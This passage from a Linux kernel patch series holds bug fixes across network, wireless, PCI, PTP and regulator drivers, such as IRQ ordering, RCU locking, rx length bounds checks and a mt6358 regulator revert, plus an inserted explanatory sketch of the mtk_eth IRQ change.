+@@ -359,6 +359,7 @@ int mv88e6xxx_g2_trunk_clear(struct mv88e6xxx_chip *chip);
+ 
+ int mv88e6xxx_g2_device_mapping_write(struct mv88e6xxx_chip *chip, int target,
+ 				      int port);
++int mv88e6xxx_g2_eeprom_wait(struct mv88e6xxx_chip *chip);
+ 
+ extern const struct mv88e6xxx_irq_ops mv88e6097_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6250_watchdog_ops;
+diff --git a/drivers/net/ethernet/ibm/ibmveth.c b/drivers/net/ethernet/ibm/ibmveth.c
+index 0b4ec6e41eb41..1d21a281222d9 100644
+--- a/drivers/net/ethernet/ibm/ibmveth.c
++++ b/drivers/net/ethernet/ibm/ibmveth.c
+@@ -1308,24 +1308,23 @@ static void ibmveth_rx_csum_helper(struct sk_buff *skb,
+ 	 * the user space for finding a flow. During this process, OVS computes
+ 	 * checksum on the first packet when CHECKSUM_PARTIAL flag is set.
+ 	 *
+-	 * So, re-compute TCP pseudo header checksum when configured for
+-	 * trunk mode.
++	 * So, re-compute TCP pseudo header checksum.
+ 	 */
++
+ 	if (iph_proto == IPPROTO_TCP) {
+ 		struct tcphdr *tcph = (struct tcphdr *)(skb->data + iphlen);
++
+ 		if (tcph->check == 0x0000) {
+ 			/* Recompute TCP pseudo header checksum  */
+-			if (adapter->is_active_trunk) {
+-				tcphdrlen = skb->len - iphlen;
+-				if (skb_proto == ETH_P_IP)
+-					tcph->check =
+-					 ~csum_tcpudp_magic(iph->saddr,
+-					iph->daddr, tcphdrlen, iph_proto, 0);
+-				else if (skb_proto == ETH_P_IPV6)
+-					tcph->check =
+-					 ~csum_ipv6_magic(&iph6->saddr,
+-					&iph6->daddr, tcphdrlen, iph_proto, 0);
+-			}
++			tcphdrlen = skb->len - iphlen;
++			if (skb_proto == ETH_P_IP)
++				tcph->check =
++				 ~csum_tcpudp_magic(iph->saddr,
++				iph->daddr, tcphdrlen, iph_proto, 0);
++			else if (skb_proto == ETH_P_IPV6)
++				tcph->check =
++				 ~csum_ipv6_magic(&iph6->saddr,
++				&iph6->daddr, tcphdrlen, iph_proto, 0);
+ 			/* Setup SKB fields for checksum offload */
+ 			skb_partial_csum_set(skb, iphlen,
+ 					     offsetof(struct tcphdr, check));
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ptp.c b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+index ffea0c9c82f1e..97a9efe7b713e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ptp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+@@ -361,9 +361,9 @@ static int i40e_ptp_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ 				   1000000ULL << 16);
+ 
+ 	if (neg_adj)
+-		adj = I40E_PTP_40GB_INCVAL - diff;
++		adj = freq - diff;
+ 	else
+-		adj = I40E_PTP_40GB_INCVAL + diff;
++		adj = freq + diff;
+ 
+ 	wr32(hw, I40E_PRTTSYN_INC_L, adj & 0xFFFFFFFF);
+ 	wr32(hw, I40E_PRTTSYN_INC_H, adj >> 32);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 0ac5ae16308f6..17e6ac4445afc 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -2862,8 +2862,8 @@ static irqreturn_t mtk_handle_irq_rx(int irq, void *_eth)
+ 
+ 	eth->rx_events++;
+ 	if (likely(napi_schedule_prep(&eth->rx_napi))) {
+-		__napi_schedule(&eth->rx_napi);
+ 		mtk_rx_irq_disable(eth, eth->soc->txrx.rx_irq_done_mask);
++		__napi_schedule(&eth->rx_napi);
+ 	}
+ 
+ 	return IRQ_HANDLED;
+@@ -2875,8 +2875,8 @@ static irqreturn_t mtk_handle_irq_tx(int irq, void *_eth)
+ 
+ 	eth->tx_events++;
+ 	if (likely(napi_schedule_prep(&eth->tx_napi))) {
+-		__napi_schedule(&eth->tx_napi);
+ 		mtk_tx_irq_disable(eth, MTK_TX_DONE_INT);
++		__napi_schedule(&eth->tx_napi);
+ 	}
+ 
+ 	return IRQ_HANDLED;
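+/*
+ * Illustrative sketch, not part of the patch above: the mtk_eth hunks
+ * mask the device interrupt before __napi_schedule() instead of after,
+ * closing the window in which the scheduled poll could run and
+ * re-enable the IRQ while the hard IRQ handler is still about to mask
+ * it. Hypothetical driver names:
+ */
+#include <linux/interrupt.h>
+#include <linux/netdevice.h>
+
+struct sketch_priv { struct napi_struct napi; };
+
+static void sketch_irq_disable(struct sketch_priv *p);
+
+static irqreturn_t sketch_irq(int irq, void *data)
+{
+	struct sketch_priv *priv = data;
+
+	if (likely(napi_schedule_prep(&priv->napi))) {
+		sketch_irq_disable(priv);	/* mask first ... */
+		__napi_schedule(&priv->napi);	/* ... then schedule the poll */
+	}
+
+	return IRQ_HANDLED;
+}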
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_ll2.h b/drivers/net/ethernet/qlogic/qed/qed_ll2.h
+index 0bfc375161ed6..a174c6fc626ac 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_ll2.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_ll2.h
+@@ -110,9 +110,9 @@ struct qed_ll2_info {
+ 	enum core_tx_dest tx_dest;
+ 	u8 tx_stats_en;
+ 	bool main_func_queue;
++	struct qed_ll2_cbs cbs;
+ 	struct qed_ll2_rx_queue rx_queue;
+ 	struct qed_ll2_tx_queue tx_queue;
+-	struct qed_ll2_cbs cbs;
+ };
+ 
+ extern const struct qed_ll2_ops qed_ll2_ops_pass;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c
+index 2b38a499a4045..533f5245ad945 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c
+@@ -105,6 +105,7 @@ struct stm32_ops {
+ 	int (*parse_data)(struct stm32_dwmac *dwmac,
+ 			  struct device *dev);
+ 	u32 syscfg_eth_mask;
++	bool clk_rx_enable_in_suspend;
+ };
+ 
+ static int stm32_dwmac_init(struct plat_stmmacenet_data *plat_dat)
+@@ -122,7 +123,8 @@ static int stm32_dwmac_init(struct plat_stmmacenet_data *plat_dat)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (!dwmac->dev->power.is_suspended) {
++	if (!dwmac->ops->clk_rx_enable_in_suspend ||
++	    !dwmac->dev->power.is_suspended) {
+ 		ret = clk_prepare_enable(dwmac->clk_rx);
+ 		if (ret) {
+ 			clk_disable_unprepare(dwmac->clk_tx);
+@@ -515,7 +517,8 @@ static struct stm32_ops stm32mp1_dwmac_data = {
+ 	.suspend = stm32mp1_suspend,
+ 	.resume = stm32mp1_resume,
+ 	.parse_data = stm32mp1_parse_data,
+-	.syscfg_eth_mask = SYSCFG_MP1_ETH_MASK
++	.syscfg_eth_mask = SYSCFG_MP1_ETH_MASK,
++	.clk_rx_enable_in_suspend = true
+ };
+ 
+ static const struct of_device_id stm32_dwmac_match[] = {
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 25466cbdc16bd..9f2553799895d 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -1614,6 +1614,7 @@ static int am65_cpsw_nuss_init_tx_chns(struct am65_cpsw_common *common)
+ 		if (tx_chn->irq <= 0) {
+ 			dev_err(dev, "Failed to get tx dma irq %d\n",
+ 				tx_chn->irq);
++			ret = tx_chn->irq ?: -ENXIO;
+ 			goto err;
+ 		}
+ 
+diff --git a/drivers/net/usb/smsc75xx.c b/drivers/net/usb/smsc75xx.c
+index 5d6454fedb3f1..78ad2da3ee29b 100644
+--- a/drivers/net/usb/smsc75xx.c
++++ b/drivers/net/usb/smsc75xx.c
+@@ -90,7 +90,9 @@ static int __must_check __smsc75xx_read_reg(struct usbnet *dev, u32 index,
+ 	ret = fn(dev, USB_VENDOR_REQUEST_READ_REGISTER, USB_DIR_IN
+ 		 | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 0, index, &buf, 4);
+-	if (unlikely(ret < 0)) {
++	if (unlikely(ret < 4)) {
++		ret = ret < 0 ? ret : -ENODATA;
++
+ 		netdev_warn(dev->net, "Failed to read reg index 0x%08x: %d\n",
+ 			    index, ret);
+ 		return ret;
+diff --git a/drivers/net/vrf.c b/drivers/net/vrf.c
+index f6dcec66f0a4b..208df4d419395 100644
+--- a/drivers/net/vrf.c
++++ b/drivers/net/vrf.c
+@@ -664,7 +664,7 @@ static int vrf_finish_output6(struct net *net, struct sock *sk,
+ 	skb->protocol = htons(ETH_P_IPV6);
+ 	skb->dev = dev;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	nexthop = rt6_nexthop((struct rt6_info *)dst, &ipv6_hdr(skb)->daddr);
+ 	neigh = __ipv6_neigh_lookup_noref(dst->dev, nexthop);
+ 	if (unlikely(!neigh))
+@@ -672,10 +672,10 @@ static int vrf_finish_output6(struct net *net, struct sock *sk,
+ 	if (!IS_ERR(neigh)) {
+ 		sock_confirm_neigh(skb, neigh);
+ 		ret = neigh_output(neigh, skb, false);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	IP6_INC_STATS(dev_net(dst->dev),
+ 		      ip6_dst_idev(dst), IPSTATS_MIB_OUTNOROUTES);
+@@ -889,7 +889,7 @@ static int vrf_finish_output(struct net *net, struct sock *sk, struct sk_buff *s
+ 		}
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	neigh = ip_neigh_for_gw(rt, skb, &is_v6gw);
+ 	if (!IS_ERR(neigh)) {
+@@ -898,11 +898,11 @@ static int vrf_finish_output(struct net *net, struct sock *sk, struct sk_buff *s
+ 		sock_confirm_neigh(skb, neigh);
+ 		/* if crossing protocols, can not use the cached header */
+ 		ret = neigh_output(neigh, skb, is_v6gw);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	vrf_tx_error(skb->dev, skb);
+ 	return -EINVAL;
+ }
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 0c3eb850fcb79..619dd71c9d75e 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1910,7 +1910,7 @@ static int arp_reduce(struct net_device *dev, struct sk_buff *skb, __be32 vni)
+ 		struct vxlan_fdb *f;
+ 		struct sk_buff	*reply;
+ 
+-		if (!(n->nud_state & NUD_CONNECTED)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_CONNECTED)) {
+ 			neigh_release(n);
+ 			goto out;
+ 		}
+@@ -2074,7 +2074,7 @@ static int neigh_reduce(struct net_device *dev, struct sk_buff *skb, __be32 vni)
+ 		struct vxlan_fdb *f;
+ 		struct sk_buff *reply;
+ 
+-		if (!(n->nud_state & NUD_CONNECTED)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_CONNECTED)) {
+ 			neigh_release(n);
+ 			goto out;
+ 		}
+diff --git a/drivers/net/wan/fsl_ucc_hdlc.c b/drivers/net/wan/fsl_ucc_hdlc.c
+index 1c53b55469270..5fec8abe8e1d3 100644
+--- a/drivers/net/wan/fsl_ucc_hdlc.c
++++ b/drivers/net/wan/fsl_ucc_hdlc.c
+@@ -34,6 +34,8 @@
+ #define TDM_PPPOHT_SLIC_MAXIN
+ #define RX_BD_ERRORS (R_CD_S | R_OV_S | R_CR_S | R_AB_S | R_NO_S | R_LG_S)
+ 
++static int uhdlc_close(struct net_device *dev);
++
+ static struct ucc_tdm_info utdm_primary_info = {
+ 	.uf_info = {
+ 		.tsa = 0,
+@@ -708,6 +710,7 @@ static int uhdlc_open(struct net_device *dev)
+ 	hdlc_device *hdlc = dev_to_hdlc(dev);
+ 	struct ucc_hdlc_private *priv = hdlc->priv;
+ 	struct ucc_tdm *utdm = priv->utdm;
++	int rc = 0;
+ 
+ 	if (priv->hdlc_busy != 1) {
+ 		if (request_irq(priv->ut_info->uf_info.irq,
+@@ -731,10 +734,13 @@ static int uhdlc_open(struct net_device *dev)
+ 		napi_enable(&priv->napi);
+ 		netdev_reset_queue(dev);
+ 		netif_start_queue(dev);
+-		hdlc_open(dev);
++
++		rc = hdlc_open(dev);
++		if (rc)
++			uhdlc_close(dev);
+ 	}
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ static void uhdlc_memclean(struct ucc_hdlc_private *priv)
+@@ -824,6 +830,8 @@ static int uhdlc_close(struct net_device *dev)
+ 	netdev_reset_queue(dev);
+ 	priv->hdlc_busy = 0;
+ 
++	hdlc_close(dev);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h b/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h
+index c62576e442bdf..2d481849a9c23 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h
+@@ -295,9 +295,9 @@ struct iwl_fw_ini_fifo_hdr {
+ struct iwl_fw_ini_error_dump_range {
+ 	__le32 range_data_size;
+ 	union {
+-		__le32 internal_base_addr;
+-		__le64 dram_base_addr;
+-		__le32 page_num;
++		__le32 internal_base_addr __packed;
++		__le64 dram_base_addr __packed;
++		__le32 page_num __packed;
+ 		struct iwl_fw_ini_fifo_hdr fifo_hdr;
+ 		struct iwl_cmd_header fw_pkt_hdr;
+ 	};
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index 887d0789c96c3..2e3c98eaa400c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -796,7 +796,7 @@ out:
+ 		mvm->nvm_data->bands[0].n_channels = 1;
+ 		mvm->nvm_data->bands[0].n_bitrates = 1;
+ 		mvm->nvm_data->bands[0].bitrates =
+-			(void *)((u8 *)mvm->nvm_data->channels + 1);
++			(void *)(mvm->nvm_data->channels + 1);
+ 		mvm->nvm_data->bands[0].bitrates->hw_value = 10;
+ 	}
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+index a04b66284af4a..7351acac6932d 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+@@ -965,8 +965,8 @@ void mwifiex_11n_rxba_sync_event(struct mwifiex_private *priv,
+ 			}
+ 		}
+ 
+-		tlv_buf_left -= (sizeof(*tlv_rxba) + tlv_len);
+-		tmp = (u8 *)tlv_rxba + tlv_len + sizeof(*tlv_rxba);
++		tlv_buf_left -= (sizeof(tlv_rxba->header) + tlv_len);
++		tmp = (u8 *)tlv_rxba  + sizeof(tlv_rxba->header) + tlv_len;
+ 		tlv_rxba = (struct mwifiex_ie_types_rxba_sync *)tmp;
+ 	}
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/sta_rx.c b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+index 65420ad674167..257737137cd70 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sta_rx.c
++++ b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+@@ -86,7 +86,8 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv,
+ 	rx_pkt_len = le16_to_cpu(local_rx_pd->rx_pkt_length);
+ 	rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_off;
+ 
+-	if (sizeof(*rx_pkt_hdr) + rx_pkt_off > skb->len) {
++	if (sizeof(rx_pkt_hdr->eth803_hdr) + sizeof(rfc1042_header) +
++	    rx_pkt_off > skb->len) {
+ 		mwifiex_dbg(priv->adapter, ERROR,
+ 			    "wrong rx packet offset: len=%d, rx_pkt_off=%d\n",
+ 			    skb->len, rx_pkt_off);
+@@ -95,12 +96,13 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv,
+ 		return -1;
+ 	}
+ 
+-	if ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
+-		     sizeof(bridge_tunnel_header))) ||
+-	    (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
+-		     sizeof(rfc1042_header)) &&
+-	     ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_AARP &&
+-	     ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_IPX)) {
++	if (sizeof(*rx_pkt_hdr) + rx_pkt_off <= skb->len &&
++	    ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
++		      sizeof(bridge_tunnel_header))) ||
++	     (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
++		      sizeof(rfc1042_header)) &&
++	      ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_AARP &&
++	      ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_IPX))) {
+ 		/*
+ 		 *  Replace the 803 header and rfc1042 header (llc/snap) with an
+ 		 *    EthernetII header, keep the src/dst and snap_type
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c b/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c
+index 0acabba2d1a50..5d402cf2951cb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c
+@@ -131,15 +131,8 @@ u8 mt76x02_get_lna_gain(struct mt76x02_dev *dev,
+ 			s8 *lna_2g, s8 *lna_5g,
+ 			struct ieee80211_channel *chan)
+ {
+-	u16 val;
+ 	u8 lna;
+ 
+-	val = mt76x02_eeprom_get(dev, MT_EE_NIC_CONF_1);
+-	if (val & MT_EE_NIC_CONF_1_LNA_EXT_2G)
+-		*lna_2g = 0;
+-	if (val & MT_EE_NIC_CONF_1_LNA_EXT_5G)
+-		memset(lna_5g, 0, sizeof(s8) * 3);
+-
+ 	if (chan->band == NL80211_BAND_2GHZ)
+ 		lna = *lna_2g;
+ 	else if (chan->hw_value <= 64)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c
+index c57e05a5c65e4..91807bf662dde 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c
+@@ -256,7 +256,8 @@ void mt76x2_read_rx_gain(struct mt76x02_dev *dev)
+ 	struct ieee80211_channel *chan = dev->mphy.chandef.chan;
+ 	int channel = chan->hw_value;
+ 	s8 lna_5g[3], lna_2g;
+-	u8 lna;
++	bool use_lna;
++	u8 lna = 0;
+ 	u16 val;
+ 
+ 	if (chan->band == NL80211_BAND_2GHZ)
+@@ -275,7 +276,15 @@ void mt76x2_read_rx_gain(struct mt76x02_dev *dev)
+ 	dev->cal.rx.mcu_gain |= (lna_5g[1] & 0xff) << 16;
+ 	dev->cal.rx.mcu_gain |= (lna_5g[2] & 0xff) << 24;
+ 
+-	lna = mt76x02_get_lna_gain(dev, &lna_2g, lna_5g, chan);
++	val = mt76x02_eeprom_get(dev, MT_EE_NIC_CONF_1);
++	if (chan->band == NL80211_BAND_2GHZ)
++		use_lna = !(val & MT_EE_NIC_CONF_1_LNA_EXT_2G);
++	else
++		use_lna = !(val & MT_EE_NIC_CONF_1_LNA_EXT_5G);
++
++	if (use_lna)
++		lna = mt76x02_get_lna_gain(dev, &lna_2g, lna_5g, chan);
++
+ 	dev->cal.rx.lna_gain = mt76x02_sign_extend(lna, 8);
+ }
+ EXPORT_SYMBOL_GPL(mt76x2_read_rx_gain);
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 95501b77ef314..0fbf331a748fd 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -902,13 +902,13 @@ int of_changeset_action(struct of_changeset *ocs, unsigned long action,
+ {
+ 	struct of_changeset_entry *ce;
+ 
++	if (WARN_ON(action >= ARRAY_SIZE(action_names)))
++		return -EINVAL;
++
+ 	ce = kzalloc(sizeof(*ce), GFP_KERNEL);
+ 	if (!ce)
+ 		return -ENOMEM;
+ 
+-	if (WARN_ON(action >= ARRAY_SIZE(action_names)))
+-		return -EINVAL;
+-
+ 	/* get a reference to the node */
+ 	ce->action = action;
+ 	ce->np = of_node_get(np);
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index d24712a76ba7c..0ccd92faf078a 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -40,7 +40,6 @@
+ #define PARF_PHY_REFCLK				0x4c
+ #define PARF_CONFIG_BITS			0x50
+ #define PARF_DBI_BASE_ADDR			0x168
+-#define PARF_SLV_ADDR_SPACE_SIZE_2_3_3		0x16c /* Register offset specific to IP ver 2.3.3 */
+ #define PARF_MHI_CLOCK_RESET_CTRL		0x174
+ #define PARF_AXI_MSTR_WR_ADDR_HALT		0x178
+ #define PARF_AXI_MSTR_WR_ADDR_HALT_V2		0x1a8
+@@ -1148,8 +1147,7 @@ static int qcom_pcie_post_init_2_3_3(struct qcom_pcie *pcie)
+ 	u16 offset = dw_pcie_find_capability(pci, PCI_CAP_ID_EXP);
+ 	u32 val;
+ 
+-	writel(SLV_ADDR_SPACE_SZ,
+-		pcie->parf + PARF_SLV_ADDR_SPACE_SIZE_2_3_3);
++	writel(SLV_ADDR_SPACE_SZ, pcie->parf + PARF_SLV_ADDR_SPACE_SIZE);
+ 
+ 	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c
+index a48d9b7d29217..8fee9b330b613 100644
+--- a/drivers/ptp/ptp_ocp.c
++++ b/drivers/ptp/ptp_ocp.c
+@@ -3532,7 +3532,6 @@ ptp_ocp_device_init(struct ptp_ocp *bp, struct pci_dev *pdev)
+ 	return 0;
+ 
+ out:
+-	ptp_ocp_dev_release(&bp->dev);
+ 	put_device(&bp->dev);
+ 	return err;
+ }
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 351f0fd225b14..f6a95f72af18d 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -5543,6 +5543,8 @@ regulator_register(struct device *dev,
+ 		goto rinse;
+ 	}
+ 	device_initialize(&rdev->dev);
++	dev_set_drvdata(&rdev->dev, rdev);
++	rdev->dev.class = &regulator_class;
+ 	spin_lock_init(&rdev->err_lock);
+ 
+ 	/*
+@@ -5604,11 +5606,9 @@ regulator_register(struct device *dev,
+ 		rdev->supply_name = regulator_desc->supply_name;
+ 
+ 	/* register with sysfs */
+-	rdev->dev.class = &regulator_class;
+ 	rdev->dev.parent = config->dev;
+ 	dev_set_name(&rdev->dev, "regulator.%lu",
+ 		    (unsigned long) atomic_inc_return(&regulator_no));
+-	dev_set_drvdata(&rdev->dev, rdev);
+ 
+ 	/* set regulator constraints */
+ 	if (init_data)
+diff --git a/drivers/regulator/mt6358-regulator.c b/drivers/regulator/mt6358-regulator.c
+index 8a5ce990f1bf9..a0441b8086712 100644
+--- a/drivers/regulator/mt6358-regulator.c
++++ b/drivers/regulator/mt6358-regulator.c
+@@ -35,19 +35,19 @@ struct mt6358_regulator_info {
+ };
+ 
+ #define MT6358_BUCK(match, vreg, min, max, step,		\
+-	volt_ranges, vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
++	vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
+ 	_modeset_reg, _modeset_shift)		\
+ [MT6358_ID_##vreg] = {	\
+ 	.desc = {	\
+ 		.name = #vreg,	\
+ 		.of_match = of_match_ptr(match),	\
+-		.ops = &mt6358_volt_range_ops,	\
++		.ops = &mt6358_buck_ops,	\
+ 		.type = REGULATOR_VOLTAGE,	\
+ 		.id = MT6358_ID_##vreg,		\
+ 		.owner = THIS_MODULE,		\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,		\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = MT6358_BUCK_##vreg##_ELR0,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_BUCK_##vreg##_CON0,	\
+@@ -87,7 +87,7 @@ struct mt6358_regulator_info {
+ }
+ 
+ #define MT6358_LDO1(match, vreg, min, max, step,	\
+-	volt_ranges, _da_vsel_reg, _da_vsel_mask,	\
++	_da_vsel_reg, _da_vsel_mask,	\
+ 	vosel, vosel_mask)	\
+ [MT6358_ID_##vreg] = {	\
+ 	.desc = {	\
+@@ -98,8 +98,8 @@ struct mt6358_regulator_info {
+ 		.id = MT6358_ID_##vreg,	\
+ 		.owner = THIS_MODULE,	\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,	\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = vosel,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_LDO_##vreg##_CON0,	\
+@@ -131,19 +131,19 @@ struct mt6358_regulator_info {
+ }
+ 
+ #define MT6366_BUCK(match, vreg, min, max, step,		\
+-	volt_ranges, vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
++	vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
+ 	_modeset_reg, _modeset_shift)		\
+ [MT6366_ID_##vreg] = {	\
+ 	.desc = {	\
+ 		.name = #vreg,	\
+ 		.of_match = of_match_ptr(match),	\
+-		.ops = &mt6358_volt_range_ops,	\
++		.ops = &mt6358_buck_ops,	\
+ 		.type = REGULATOR_VOLTAGE,	\
+ 		.id = MT6366_ID_##vreg,		\
+ 		.owner = THIS_MODULE,		\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,		\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = MT6358_BUCK_##vreg##_ELR0,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_BUCK_##vreg##_CON0,	\
+@@ -183,7 +183,7 @@ struct mt6358_regulator_info {
+ }
+ 
+ #define MT6366_LDO1(match, vreg, min, max, step,	\
+-	volt_ranges, _da_vsel_reg, _da_vsel_mask,	\
++	_da_vsel_reg, _da_vsel_mask,	\
+ 	vosel, vosel_mask)	\
+ [MT6366_ID_##vreg] = {	\
+ 	.desc = {	\
+@@ -194,8 +194,8 @@ struct mt6358_regulator_info {
+ 		.id = MT6366_ID_##vreg,	\
+ 		.owner = THIS_MODULE,	\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,	\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = vosel,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_LDO_##vreg##_CON0,	\
+@@ -226,21 +226,6 @@ struct mt6358_regulator_info {
+ 	.qi = BIT(15),							\
+ }
+ 
+-static const struct linear_range buck_volt_range1[] = {
+-	REGULATOR_LINEAR_RANGE(500000, 0, 0x7f, 6250),
+-};
+-
+-static const struct linear_range buck_volt_range2[] = {
+-	REGULATOR_LINEAR_RANGE(500000, 0, 0x7f, 12500),
+-};
+-
+-static const struct linear_range buck_volt_range3[] = {
+-	REGULATOR_LINEAR_RANGE(500000, 0, 0x3f, 50000),
+-};
+-
+-static const struct linear_range buck_volt_range4[] = {
+-	REGULATOR_LINEAR_RANGE(1000000, 0, 0x7f, 12500),
+-};
+ 
+ static const unsigned int vdram2_voltages[] = {
+ 	600000, 1800000,
+@@ -463,9 +448,9 @@ static unsigned int mt6358_regulator_get_mode(struct regulator_dev *rdev)
+ 	}
+ }
+ 
+-static const struct regulator_ops mt6358_volt_range_ops = {
+-	.list_voltage = regulator_list_voltage_linear_range,
+-	.map_voltage = regulator_map_voltage_linear_range,
++static const struct regulator_ops mt6358_buck_ops = {
++	.list_voltage = regulator_list_voltage_linear,
++	.map_voltage = regulator_map_voltage_linear,
+ 	.set_voltage_sel = regulator_set_voltage_sel_regmap,
+ 	.get_voltage_sel = mt6358_get_buck_voltage_sel,
+ 	.set_voltage_time_sel = regulator_set_voltage_time_sel,
+@@ -477,6 +462,18 @@ static const struct regulator_ops mt6358_volt_range_ops = {
+ 	.get_mode = mt6358_regulator_get_mode,
+ };
+ 
++static const struct regulator_ops mt6358_volt_range_ops = {
++	.list_voltage = regulator_list_voltage_linear,
++	.map_voltage = regulator_map_voltage_linear,
++	.set_voltage_sel = regulator_set_voltage_sel_regmap,
++	.get_voltage_sel = mt6358_get_buck_voltage_sel,
++	.set_voltage_time_sel = regulator_set_voltage_time_sel,
++	.enable = regulator_enable_regmap,
